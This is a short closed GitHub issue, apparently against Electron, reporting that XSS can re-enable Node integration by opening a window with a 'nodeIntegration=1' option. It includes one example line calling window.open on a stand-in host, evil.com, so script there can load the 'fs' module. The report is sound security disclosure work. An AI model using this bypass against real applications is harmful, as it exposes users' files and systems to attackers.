Closed
Description
openedon Jan 8, 2016
A developer might disable Node integration in a browser window to limit the damage that an XSS attack could cause. But if an XSS attack could open a window to its own endpoint and, when opening the window, re-enable Node integration, this is moot:
// JavaScript on 'evil.com' will be able to `require('fs')` etc.
window.open('http://evil.com', '', 'nodeIntegration=1');Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Metadata
Assignees
Labels
No labels